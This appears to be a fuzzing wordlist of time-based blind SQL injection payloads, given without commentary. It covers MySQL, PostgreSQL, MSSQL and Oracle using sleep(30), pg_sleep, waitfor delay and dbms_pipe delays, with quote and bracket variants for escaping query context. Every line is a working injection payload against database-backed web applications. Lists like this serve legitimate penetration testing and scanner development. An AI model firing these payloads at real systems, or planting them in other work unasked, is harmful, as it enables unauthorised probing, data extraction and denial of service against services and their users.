- "' or sleep(30)='\""
- "sleep(30)#"
- "1 or sleep(30)#"
- "\" or sleep(30)#"
- "' THEN dbms_pipe.receive_message(('a'),30)-- "
- "' THEN dbms_pipe.receive_message(('a'),30)# "
- "dbms_pipe.receive_message(('a'),30)"
- "' or sleep(30)#"
- "\" or sleep(30)=\""
- "' or sleep(30)='"
- "1) or sleep(30)#"
- "\") or sleep(30)=\""
- "') or sleep(30)='"
- "1)) or sleep(30)#"
- "\")) or sleep(30)=\""
- "')) or sleep(30)='"
- ";waitfor delay '0:0:30'--"
- ");waitfor delay '0:0:30'--"
- "';waitfor delay '0:0:30'--"
- "\";waitfor delay '0:0:30'--"
- "');waitfor delay '0:0:30'--"
- "\");waitfor delay '0:0:30'--"
- "));waitfor delay '0:0:30'--"
- "'));waitfor delay '0:0:30'--"
- "\"));waitfor delay '0:0:30'--"
- "pg_sleep(30)--"
- "1 or pg_sleep(30)-- "
- "\" or pg_sleep(30)-- "
- "' or pg_sleep(30)-- "
- "1) or pg_sleep(30)-- "
- "\") or pg_sleep(30)-- "
- "') or pg_sleep(30)-- "
- "1)) or pg_sleep(30)-- "
- "\")) or pg_sleep(30)-- "
- "')) or pg_sleep(30)-- "
- "AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe"
- "AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='"
- "AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)"
- "AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--"
- "AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#"
- "SLEEP(30)#"
- "SLEEP(30)--"
- "SLEEP(30)=\""
- "SLEEP(30)='"
- "or SLEEP(30)"
- "or SLEEP(30)#"
- "or SLEEP(30)--"
- "or SLEEP(30)=\""
- "or SLEEP(30)='"
- "waitfor delay '00:00:30'"
- "waitfor delay '00:00:30'--"
- "waitfor delay '00:00:30'#"
- "pg_SLEEP(30)"
- "pg_SLEEP(30)--"
- "pg_SLEEP(30)#"
- "or pg_SLEEP(30)"
- "or pg_SLEEP(30)--"
- "or pg_SLEEP(30)#"
- "AnD SLEEP(30)"
- "AnD SLEEP(30)--"
- "AnD SLEEP(30)#"
- "&&SLEEP(30)"
- "&&SLEEP(30)--"
- "&&SLEEP(30)#"
- "' AnD SLEEP(30) ANd '1"
- "'&&SLEEP(30)&&'1"
- "ORDER BY SLEEP(30)"
- "ORDER BY SLEEP(30)--"
- "ORDER BY SLEEP(30)#"
- "(SELECT * FROM (SELECT(SLEEP(30)))ecMj)"
- "(SELECT * FROM (SELECT(SLEEP(30)))ecMj)#"
- "(SELECT * FROM (SELECT(SLEEP(30)))ecMj)--"
- "+ SLEEP(30) + '"
